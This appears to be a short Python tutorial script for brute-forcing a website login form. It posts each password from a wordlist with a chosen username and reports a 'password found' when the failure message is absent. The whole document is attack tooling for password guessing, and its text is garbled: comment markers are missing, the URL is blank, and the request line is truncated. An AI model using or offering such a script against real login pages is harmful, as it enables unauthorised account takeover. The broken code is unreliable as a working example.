import requests
define the webpage you want to crack
this page must be a login page with a username and password
url = ""
let's get the username
username = input("What is the username you wish to attempt? ")
next, let's get the password file
password_file = input("Please enter the name of the password file: ")
open the password file in read mode
file = open(password_file, "r") now let's get each password in the password_file
for password in file.readlines():
let's strip it of any \n
password = password.strip("\n")
collect the data needed from "inspect element"
data = {'username':username, 'password':password, "Login":'submit'}
send_data_url =, data=data)
if "Login failed" in str(send_data_url.content):
print("[*] Attempting password: %s" % password)
print("[*] Password found: %s " % password)